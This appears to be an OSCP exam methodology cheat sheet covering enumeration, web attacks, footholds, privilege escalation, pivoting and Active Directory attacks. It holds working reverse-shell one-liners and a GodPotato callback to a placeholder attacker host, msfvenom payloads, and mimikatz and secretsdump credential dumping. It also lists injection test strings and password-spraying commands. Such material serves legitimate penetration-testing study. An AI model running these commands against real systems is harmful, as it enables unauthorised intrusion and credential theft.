OSCP Methodology Checklist
Huge advice from OSCP mentors:
x
If a password contains " ! " : it is neccesary to scape it with \ = " \! "
Even using ' ' will cause issues with command executions and will not read the !
Always use "\!" when there is ! in passwords
example:
nxc smb 10.10.10.10 -u offsec -p "Password1\!"
==nxc smb 10.10.10.10 -u offsec -p 'Password1!' will not work properly==
⚡ STUCK? Emergency Quick-Reference
| Situation | Do This |
|---|---|
| No foothold after 30 min | Re-read nmap output. Google every version. Try default creds. Check UDP. Try POST on APIs. Check page source for hidden paths/comments. |
| Shell but can’t privesc | dir C:\ or Get-ChildItem C:\ or ls / for unusual dirs. netstat -ano / ss -tulnp for localhost services. Read every file in home dirs. Crack any protected files. Run pspy64 (Linux). Check PS history (Windows). |
| AD — stuck after initial creds | GREP TRANSCRIPTS FIRST: smbclient //IP/share -c recurse ON; ls then grep ConvertTo-SecureString, PSCredential in .ps1/.txt/*.log. Read EVERY SMB share non-default first. Then BloodHound, Kerberoast/AS-REP, spray creds, ADCS, delegation. |
| Exploit not working | Check architecture (32 vs 64). Read the code. Modify hardcoded IPs/ports/paths. Try cross-compiling. Check bad characters. Try nc.exe pattern instead of msfvenom exe. |
| Need to move on | Never spend >2 hours stuck. Take a break, come back with fresh eyes. 70 points passes — you can skip one standalone. |
PHASE 0 — Exam Setup (First 10 Minutes)
export ip=<TARGET_IP>
script -a /home/kali/oscp/exam_log_$(date +%F).txt
# Start your tools HTTP server NOW — run in a SEPARATE terminal tab
# so your working directory doesn't change:
python3 -m http.server 80 -d ~/Tools &
# ~/Tools should have: linpeas.sh, winpeas.exe, chisel, chisel.exe,
# nc.exe, SharpHound.exe, PowerView.ps1, pspy64, GodPotato.exe, PrintSpoofer64.exe
# AD set — DNS and time sync
sudo ntpdate <DC_IP>
# Add ALL names from nmap (FQDN + domain + hostname) on ONE line:
echo "<DC_IP> dc.domain.local domain.local dc" | sudo tee -a /etc/hosts
# resolv.conf: keep 8.8.8.8 for internet. DC goes in /etc/hosts ONLY.
echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf
Passing combos (70 pts to pass):
- AD full (40) + 1 standalone full (20) + 1 standalone initial (10) = 70 PASS
- AD partial (30) + 2 standalone full (40) = 70 PASS
- AD full (40) + 2 standalone full (40) = 80 comfortable
AD has partial credit: 10 pts per workstation flag, 20 pts for DC.
Time management:
| Block | Time | Focus |
|---|---|---|
| Hours 0–1 | 1 hr | Scan ALL machines. Let scans run. Read results. Plan attack order. |
| Hours 1–5 | 4 hr | AD set (40 pts). BloodHound → Kerberoast → lateral → DC. |
| Hours 5–9 | 4 hr | Standalone 1 and 2. |
| Hours 9–11 | 2 hr | Standalone 3 or revisit stuck boxes. |
| Hours 11–12 | 1 hr | Start screenshots + report notes while access is fresh. |
| Hours 12–16 | 4 hr | Continue exploitation. Rotate between stuck boxes. |
| Hours 16+ | remaining | Clean up. Ensure all screenshots taken. Verify all proof flags. |
Strategy: AD set first (40 points, most efficient). Never spend >2 hours stuck on one box. Every credential found → spray everywhere immediately.
Report reminders: Screenshot proof flags with whoami; hostname; ip a; cat proof.txt (Linux) or whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\proof.txt (Windows — use semicolons, not &&). Document every step — the report is pass/fail. Take screenshots AS you go, not after.
PHASE 1 — Enumeration
1a. Port Scanning (run all three simultaneously)
# Terminal 1: Fast all-port TCP
sudo nmap -Pn -p- --min-rate=1000 -T4 -oN fast_tcp.txt $ip
# Terminal 2: Top 20 UDP
sudo nmap -Pn -sU --top-ports=20 -oN udp_top20.txt $ip
# Terminal 3: Targeted scan (after fast scan finishes)
ports=$(grep '^[0-9]' fast_tcp.txt | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
sudo nmap -A -Pn -sC -sV -p $ports -oA targeted $ip
# Vuln scan (run while you manually enumerate)
sudo nmap -sV -p $ports --script "vuln" $ip -oN vuln.txt
1b. Port-by-Port Commands
Work through every open port. Bold = most common foothold vectors.
| Port | Quick Commands |
|---|---|
| 21 FTP | ftp $ip (anonymous:anonymous). If writable + overlaps web root → upload webshell |
| 22 SSH | Note version. Only brute-force with known username. ssh2john if you find a key |
| 53 DNS | dig AXFR @$ip <domain>, dnsrecon -d <domain> -n $ip -t std |
| 80/443 HTTP | → Go to Phase 2 Web below |
| 88 Kerberos | kerbrute userenum -d DOMAIN --dc $ip users.txt |
| 110/143 POP/IMAP | telnet $ip 110 — USER/PASS/LIST/RETR |
| 111/2049 NFS | showmount -e $ip, mount and check for no_root_squash |
| 135 MSRPC | rpcclient -U "" -N $ip -c ’enumdomusers; netshareenumall' |
| 139/445 SMB | enum4linux-ng -A $ip, smbclient -L //$ip -N, smbmap -H $ip, nmap --script smb-vuln* -p 445 $ip. Download everything: smbclient //$ip/share -N -c 'recurse;prompt;mget *' |
| 161 SNMP | onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt $ip, then snmpwalk -c <string> -v2c $ip. Windows OIDs: users 1.3.6.1.4.1.77.1.2.25, processes 1.3.6.1.2.1.25.4.2.1.2, software 1.3.6.1.2.1.25.6.3.1.2, TCP ports 1.3.6.1.2.1.6.13.1.3 |
| 389/636 LDAP | ldapsearch -x -H ldap://$ip -s base namingcontexts, then enumerate with creds |
| 1433 MSSQL | impacket-mssqlclient sa:password@$ip, try xp_cmdshell |
| 3306 MySQL | mysql -h $ip -u root, try no password. Local via evil-winrm: .\mysql.exe -u root -e "SHOW DATABASES;" (-e avoids hanging) |
| 5432 Postgres | psql -h $ip -U postgres, try COPY TO PROGRAM |
| 5985/5986 WinRM | evil-winrm -i $ip -u user -p pass (5986 = SSL: add -S) |
| 6379 Redis | redis-cli -h $ip — CONFIG GET dir, write webshell |
| 3389 RDP | xfreerdp /u:user /p:pass /v:$ip /cert:ignore +clipboard |
| 8080/8443 Alt Web | Same as 80/443. Check for Tomcat (try tomcat:s3cret at /manager), Jenkins (script console → Groovy shell), WebLogic |
curl http://$ip:PORT/endpoint # GET
curl -d "" -X POST http://$ip:PORT/endpoint # POST (adds content-length)
PHASE 2 — Web Attacks
Step 1 — Recon (run in parallel)
feroxbuster -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,html,asp,aspx,jsp,bak -C 404 -t 50
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 50
# Check for cgi-bin (Shellshock!)
gobuster dir -u http://$ip/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x sh,pl,cgi -t 50
# Virtual hosts (if domain name known)
ffuf -u http://$ip/ -H "Host: FUZZ.<domain>" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <default_size>
# Nikto (run in background — slow but finds things)
nikto -h http://$ip -o nikto.txt &
Always check manually: robots.txt, sitemap.xml, .git/HEAD, web.config, .env, page source (comments, JS files, hidden fields, version numbers)
Step 2 — CMS?
wpscan --url http://$ip --enumerate p --plugins-detection aggressive # WordPress
droopescan scan drupal -u http://$ip # Drupal
→ searchsploit <CMS> <version> for any CMS found
Step 3 — Default Creds
Try on every login: admin:admin, admin:password, admin:Password1, root:root, tomcat:s3cret
Step 4 — Test Parameters
For every input/parameter found:
| Attack | Quick Test |
|---|---|
| SQLi | ', ' OR 1=1-- -, time-based 1' WAITFOR DELAY '0:0:5'-- - |
| XSS | <script>alert(1)</script>, "><img src=x onerror=alert(1)> |
| LFI | ../../../../etc/passwd, php://filter/convert.base64-encode/resource=index |
| Command injection | ; id, | id, $(id), backticks |
| SSTI | ${7*7}, {{7*7}}, <%= 7*7 %> — a rendered 49 means injectable |
Step 5 — File Upload?
If you find any upload form:
- Upload a webshell matching the stack (
.php,.aspx,.jsp) - Bypass extension filters: double extension (
shell.php.jpg), mixed case (.pHp), alternates (.phtml,.php5,.phar) - Bypass content-type checks: set
Content-Type: image/pngin Burp while keeping the malicious body - Prepend a valid magic header (e.g.
GIF89a;) to pass image validation - Find where it lands (
/uploads/,/files/) and browse to it to execute
PHASE 3 — Foothold
- Known exploit —
searchsploithit with matching version? Read code, modify, execute - Default/weak creds — tried on every login, DB, management interface?
- Web exploitation — SQLi, LFI, upload, command injection found in Phase 2?
- Credential reuse — any cred found anywhere → try on SSH, WinRM, RDP, SMB, everything
- Brute force (last resort) — only with known username:
hydra -l user -P rockyou.txt ssh://$ip -t 4
Reverse shell setup:
rlwrap nc -lvnp 443 # port 443 -- port 4444 is often blocked by firewalls
# Bash
bash -c 'bash -i >& /dev/tcp/ATTACKER/443 0>&1'
# Python (Linux)
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PowerShell (Windows — when you can run commands but can't upload files yet)
powershell -nop -w hidden -c "$c=New-Object System.Net.Sockets.TCPClient('ATTACKER',443);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$t=$r+'PS '+(pwd).Path+'> ';$s.Write(([Text.Encoding]::ASCII.GetBytes($t)),0,$t.Length);$s.Flush()};$c.Close()"
# msfvenom
# 64-bit (try first)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f elf -o shell.elf
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f exe -o shell.exe
# 32-bit (if target is x86 — check with `file` on Linux or `systeminfo` on Windows)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f elf -o shell32.elf
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f exe -o shell32.exe
PHASE 4 — Post-Exploitation (immediately after EVERY shell)
Do ALL of these steps on EVERY machine you land on, every time. Not just the first one.
Step 1 — Stabilize your shell
Linux:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
# Enter Enter
export TERM=xterm-256color
stty rows 50 cols 200
Windows (if you got a raw cmd.exe shell via nc.exe):
# Switch from cmd to PowerShell on the target:
powershell -ep bypass
# If shell keeps dying — use nc.exe for a new callback (already uploaded in Step 2b):
C:\Windows\Temp\nc.exe KALI_IP 443 -e cmd.exe
# Catch it on Kali in a different terminal: rlwrap nc -lvnp 443
Step 2 — Identify + screenshot
# Linux # Windows
whoami && id whoami /all
hostname hostname
ip a ipconfig /all
⚠️ Screenshot this immediately. On exam day you WILL forget later.
Step 2b — Upload tools TO target
Your HTTP file server should already be running from Phase 0. If not: cd ~/Tools && python3 -m http.server 80 &
# Upload to Linux target
wget http://KALI/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
wget http://KALI/chisel -O /tmp/chisel && chmod +x /tmp/chisel
wget http://KALI/pspy64 -O /tmp/pspy64 && chmod +x /tmp/pspy64
# Upload to Windows target
certutil -urlcache -f http://KALI/winpeas.exe C:\Windows\Temp\winpeas.exe
certutil -urlcache -f http://KALI/chisel.exe C:\Windows\Temp\chisel.exe
certutil -urlcache -f http://KALI/nc.exe C:\Windows\Temp\nc.exe
# Alt if certutil blocked:
powershell -c "iwr http://KALI/winpeas.exe -OutFile C:\Windows\Temp\winpeas.exe"
# Via evil-winrm (has built-in upload):
upload /home/kali/Tools/winpeas.exe C:\Windows\Temp\winpeas.exe
Download files FROM target to Kali (for winpeas results, loot, etc.):
# Option 1: evil-winrm built-in
*Evil-WinRM* PS> download C:\Windows\Temp\winpeas.txt .
# Option 2: SMB server on Kali (run in separate terminal)
impacket-smbserver smb $(pwd) -smb2support
# Then on target: copy C:\Windows\Temp\winpeas.txt \\KALI_IP\smb\winpeas.txt
Step 3 — Grab flags
cat /home/*/local.txt && cat /root/proof.txt 2>/dev/null # Linux
Get-ChildItem -Path C:\Users -Recurse -Filter local.txt -ErrorAction SilentlyContinue | Get-Content # Windows
Get-ChildItem -Path C:\Users -Recurse -Filter proof.txt -ErrorAction SilentlyContinue | Get-Content
Step 4 — Check for internal networks + hidden services
Run these on every machine you land on:
# LINUX # WINDOWS
ip a ipconfig /all
ip route route print
arp -a arp -a
ss -tulnp netstat -ano | findstr LISTENING
Read the output. Three things to look for:
A) Does this machine have TWO network interfaces?
Example: ip a shows eth0: 192.168.x.x AND eth1: 172.16.x.x
This means this machine can see an internal network that your Kali CANNOT reach. You need to tunnel through it.
Use Chisel for pivoting (see the tunneling section):
# Terminal on Kali — start Chisel server
./chisel server -p 9999 --reverse
# Chisel binary should already be on target from Step 2b.
# If not: download from your python3 HTTP server on port 80.
# On compromised machine — connect back
# Linux:
./chisel client KALI_IP:9999 R:socks
# Windows:
.\chisel.exe client KALI_IP:9999 R:socks
# Edit /etc/proxychains4.conf on Kali — change last line to:
# socks5 127.0.0.1 1080
# Now ALL your Kali tools work through the tunnel:
proxychains -q nmap -sT -Pn -p 80,445,5985,3389 INTERNAL_IP
proxychains -q curl http://INTERNAL_IP
proxychains -q evil-winrm -i INTERNAL_IP -u USER -p PASS
proxychains -q smbclient -L //INTERNAL_IP -U USER
After the tunnel is up → go back to Phase 1 and enumerate the new subnet.
B) Is there a service listening on 127.0.0.1 (localhost only)?
Example: netstat -ano shows 127.0.0.1:8080 LISTENING
This service is only reachable from this machine. You need to forward that port to your Kali.
Use Chisel (same tool as scenario A — just different syntax):
# Chisel server should already be running from scenario A. If not:
# ./chisel server -p 9999 --reverse
# On target — chisel binary should already be there from Step 2b.
# TIP: You can combine SOCKS + port forward in one client connection:
# ./chisel client KALI_IP:9999 R:socks R:9090:127.0.0.1:8080
# Forward target's localhost:8080 to Kali's localhost:9090
.\chisel.exe client KALI_IP:9999 R:9090:127.0.0.1:8080
# Linux: ./chisel client KALI_IP:9999 R:9090:127.0.0.1:8080
# Step 3: On Kali — access the forwarded service
curl http://127.0.0.1:9090
# Or open in browser: http://127.0.0.1:9090
Chisel is a single binary you upload. No SSH or Socat needed on target. Forward multiple ports at once:
R:9090:127.0.0.1:8080 R:9091:127.0.0.1:3306Change 8080 and 9090 to whatever ports YOU found in netstat.
Common localhost services worth investigating: 80/8080 (web app), 1433 (MSSQL), 3306 (MySQL), 5432 (Postgres).
Before tunneling — try interacting directly from the target:
# MySQL (from C:\xampp\mysql\bin or wherever mysql.exe lives)
.\mysql.exe -u root --password=""
.\mysql.exe -u root -e "SHOW DATABASES;"
.\mysql.exe -u root -e "USE dbname; SELECT * FROM users;"
# ⚠️ Evil-WinRM hangs on interactive prompts — always use -e flag
# Identify what process owns an unknown port (no admin needed)
Get-Process -Id <PID> | Select-Object Name,Path
# Or map ALL ports at once:
Get-NetTCPConnection -State Listen | Select-Object LocalAddress,LocalPort,OwningProcess,@{Name='Process';Expression={(Get-Process -Id $_.OwningProcess).Name}} | Sort-Object LocalPort
C) Neither? Continue to Step 5.
Step 5 — Harvest credentials + Loot Filesystem + ADD TO CREDS TABLE
# Linux: bash history, config files, env vars, .git repos
cat ~/.bash_history
env | grep -i pass
find / -name ".git" -type d 2>/dev/null
grep -ri 'password' /var/www/ /opt/ /home/ 2>/dev/null
# Windows — commands that work in BOTH CMD and PS:
whoami /all
cmdkey /list
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
netstat -ano | findstr LISTENING
# CMD-only (if your prompt is C:\>):
type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\inetpub\wwwroot\web.config 2>nul
type C:\Windows\Panther\unattend.xml 2>nul
# PS-only (if your prompt is PS C:\>):
Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinue
Get-Content C:\inetpub\wwwroot\web.config -EA SilentlyContinue
Get-Content C:\Windows\Panther\unattend.xml -EA SilentlyContinue
Get-ChildItem -Path C:\ -Recurse -Filter *.kdbx -EA SilentlyContinue | Select FullName
# Hidden AppData — PS only (dir WON'T show this folder, WinPEAS MISSES it):
Get-ChildItem -Path C:\Users\*\AppData -Recurse -Include *.xml,*.config,*.ini,*.txt,*.settings -Force -EA SilentlyContinue | Select-String -Pattern "password|credential|passwd" -List | Select Path
# Then read whatever it finds: Get-Content "<PATH>" -EA SilentlyContinue
# Windows: Check local databases for creds (if MySQL/MSSQL found in Step 4)
.\mysql.exe -u root -e "SHOW DATABASES;"
# Then dump every non-default database:
.\mysql.exe -u root -e "USE creds; SHOW TABLES;"
.\mysql.exe -u root -e "USE creds; SELECT * FROM users;"
.\mysql.exe -u root -e "USE wordpress; SELECT user_login,user_pass FROM wp_users;"
⚠️ EVERY credential found → update your creds table → spray EVERYWHERE immediately.
# Create files with ALL creds found so far
echo -e "administrator\ncharlotte\njohn" > users.txt
echo -e "Password1\nFound_Pass2" > passes.txt
# Spray ALL users x ALL passwords x ALL services x ALL IPs
nxc smb <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success
nxc winrm <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success
nxc rdp <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success
nxc mssql <SUBNET>/24 -u users.txt -p passes.txt --continue-on-success
This single habit — spray every cred the moment you find it across every service — is how chains get built.
Step 6 — Privesc
→ Phase 5 (Linux) or Phase 6 (Windows)
Step 7 — AFTER getting root/admin (do this EVERY time)
# 1. Screenshot proof (all 4 in one shot — DO NOT SKIP)
# Linux: whoami && hostname && ip a && cat /root/proof.txt
# Windows: whoami; hostname; ipconfig; type C:\Users\Administrator\Desktop\proof.txt
# 2. Dump all credentials (memory + registry)
# From Kali: impacket-secretsdump 'DOMAIN/USER:PASS'@TARGET_IP
# On Windows: mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
# On Linux: cat /etc/shadow
# Run the 8-check checklist. This catches creds that mimikatz/secretsdump MISS:
# log files with hashes, text files with plaintext creds, SSH keys, backup files, web configs
# 4. Check for internal networks AGAIN (root may see new interfaces)
# ip a / ipconfig /all — re-run Step 4
# 5. SPRAY all new creds immediately
nxc smb ALL_IPS -u 'NEW_USER' -p 'NEW_PASS' --continue-on-success
PHASE 5 — Linux Privilege Escalation
Run checks in this order. First three catch ~80% of vectors.
| # | Check | Command | If Found |
|---|---|---|---|
| 1 | sudo -l | sudo -l | → GTFOBins |
| 2 | SUID | find / -perm -u=s -type f 2>/dev/null | → GTFOBins |
| 3 | Cron/timers | cat /etc/crontab && ls -la /etc/cron.d/ + run pspy64 | Writable script? PATH hijack? |
| 4 | Capabilities | getcap -r / 2>/dev/null | cap_setuid = instant root |
| 5 | LinPEAS | ./linpeas.sh then review output | Check RED/YELLOW items |
| 6 | Passwords | grep -ri 'password' /var/www/ /opt/ /home/ + bash_history | Credential reuse |
| 7 | SSH keys | find / -name id_rsa 2>/dev/null | SSH as other user |
| 8 | Writable /etc/passwd | ls -la /etc/passwd | Add root user |
| 9 | Internal services | ss -tulnp | Localhost-only = forward with Chisel → Phase 4 Step 4B |
| 10 | NFS no_root_squash | cat /etc/exports | Mount + SUID bash |
| 11 | Docker/LXD group | id | Container escape |
| 12 | Kernel (LAST RESORT) | uname -a + linux-exploit-suggester | PwnKit, DirtyPipe |
PHASE 6 — Windows Privilege Escalation
⚠️ Which shell are you in? Check your prompt:
C:\>= CMD.PS C:\>= PowerShell. Commands below work in both unless labeled. Switch anytime: typecmdfor CMD,powershell -ep bypassfor PS.
| # | Check | Command (works in both) | If Found |
|---|---|---|---|
| 2 | WinPEAS | .\winpeas.exe cmd | Tee-Object -FilePath .\winpeas.txt (PS) or .\winpeas.exe cmd > winpeas.txt (CMD) | Check RED/YELLOW highlights |
| 3 | Service misconfig | wmic service get name,pathname,startmode | Unquoted path or writable binary → sc config |
| 4 | Saved creds | cmdkey /list | Entries found → runas /savecred |
| 5 | PS history | CMD: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt / PS: Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinue | Credential reuse |
| 6 | AlwaysInstallElevated | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | msfvenom MSI |
| 7 | SAM/SYSTEM backups | CMD: dir C:\Windows\Repair\SAM / PS: Get-ChildItem C:\Windows\Repair\SAM -EA SilentlyContinue | secretsdump |
| 8 | Scheduled tasks | schtasks /query /fo LIST /v | Writable script? |
| 10 | DLL hijacking | CMD: echo %PATH% / PS: $env:PATH -split ';' | Writable dir in PATH → plant DLL |
| 11 | Internal services | netstat -ano | findstr LISTENING | Interact directly first (MySQL -e, curl) → tunnel with Chisel if needed → Phase 4 Step 4B |
| 12 | UAC bypass | whoami /groups | Medium Mandatory + admin → fodhelper |
Also run:
- CMD:
findstr /si "password" *.txt *.xml *.ini *.config(from user home, not C:\) - PS:
Get-ChildItem -Recurse -Include *.txt,*.xml,*.ini,*.config -EA SilentlyContinue | Select-String "password" -List | Select Path - Both:
reg query HKLM /f password /t REG_SZ /s
Potato attack quick reference:
| OS | Tool |
|---|---|
| Server 2016 and older | JuicyPotato |
| Server 2019+ / Win10 1809+ | PrintSpoofer |
| Universal | GodPotato or SigmaPotato |
PrintSpoofer.exe -i -c cmd
GodPotato-NET4.exe -cmd "C:\Windows\Temp\nc.exe ATTACKER 443 -e cmd.exe"
How to Read WinPEAS / LinPEAS Output (don’t read the whole thing)
PEAS output is thousands of lines. You don’t read it all. You search for specific sections.
LinPEAS — check these sections in order:
# Save output to file first
./linpeas.sh | tee linpeas.txt
==
# Then search for what matters:
grep -A5 '\[1\]' linpeas.txt # RED/YELLOW findings (highest priority)
grep -A3 'sudo -l' linpeas.txt # sudo permissions
grep -B2 -A2 'SUID' linpeas.txt # SUID binaries
grep -B2 -A5 'Cron' linpeas.txt # cron jobs
grep -A3 'Capabilities' linpeas.txt # file capabilities
grep -B2 -A5 'password\|credential' linpeas.txt # passwords in files
grep -A3 'writable' linpeas.txt # writable files/dirs
grep -A5 'docker\|lxd' linpeas.txt # container escapes
grep -A3 '127.0.0.1' linpeas.txt # localhost-only services
.\winPEASx64.exe cmd | Tee-Object -FilePath .\winpeas.txt
Color guide: RED/YELLOW = almost certainly exploitable. RED = critical finding. GREEN = interesting info.
WinPEAS — check these sections in order:
# Save output to file (redirect because colors make it unreadable in terminal)
.\winpeas.exe cmd > C:\Windows\Temp\winpeas.txt
# Download to Kali (SMB server or evil-winrm download)
# Then search:
grep -A5 'Password\|credential\|AutoLogon' winpeas.txt
grep -A5 'SeImpersonate\|SeBackup\|SeDebug\|SeRestore' winpeas.txt
grep -A5 'Unquoted\|Modifiable' winpeas.txt # service misconfigs
grep -A5 'AlwaysInstallElevated' winpeas.txt
grep -A5 'PSReadLine\|ConsoleHost_history' winpeas.txt
grep -A5 'Unattend\|web.config\|SiteList' winpeas.txt
grep -B2 -A5 '127.0.0.1' winpeas.txt # localhost services
grep -A3 'Backup Operators\|Server Operators\|DnsAdmins' winpeas.txt
Shortcut: Run winpeas.exe cmd not just winpeas.exe — the cmd flag gives cleaner output without ANSI colors that break file redirection.
⚠️ Don’t spend 30 minutes reading PEAS output top-to-bottom. Grep for the sections above, check RED/YELLOW items, move on.
PHASE 7 — Active Directory (Assumed Breach)
The AD Chain (memorize this)
1. Given creds → BloodHound + netexec enum (Playbook Phase 1)
2. Kerberoast + AS-REP roast → crack → spray (Phase 2)
3. Check BloodHound: ACL edges? ADCS? Delegation? (Phase 3-4)
4. Every machine you get admin on → secretsdump → spray new hashes (Phase 5-6)
5. Repeat steps 2-4 with every new credential
6. DA → DCSync → PtH to DC → proof.txt (Phase 9)
AD-Specific Reminders
- BloodHound first, always. Before any attack, run collection + check shortest paths.
- Credential table is everything. Update it after every secretsdump, every crack, every config file. Spray immediately.
- Check sessions: BloodHound custom query
MATCH p=(c:Computer)-[:HasSession]->(m:User) RETURN p— tells you where high-value users are logged in. - Stuck? Re-run BloodHound queries. Read EVERY SMB share. Check ADCS. Kerberoast again with new users. Spray every password variant.
Quick Reference Links
| Need | Page |
|---|---|
| Per-service enumeration | Enumeration |
| Web app testing | Web Attacks · SQL Injection |
| Getting a shell / file transfers | Shells & File Transfers |
| Linux privesc | Linux Privilege Escalation |
| Windows privesc | Windows Privilege Escalation |
| Active Directory | AD Playbook · AD Tools |
| Pivoting | Pivoting & Tunneling · Ligolo-ng |
| Cracking hashes | Hash Types · Password Attacks |
| Buffer overflow | Buffer Overflows |
| Writing the report | Report Writing |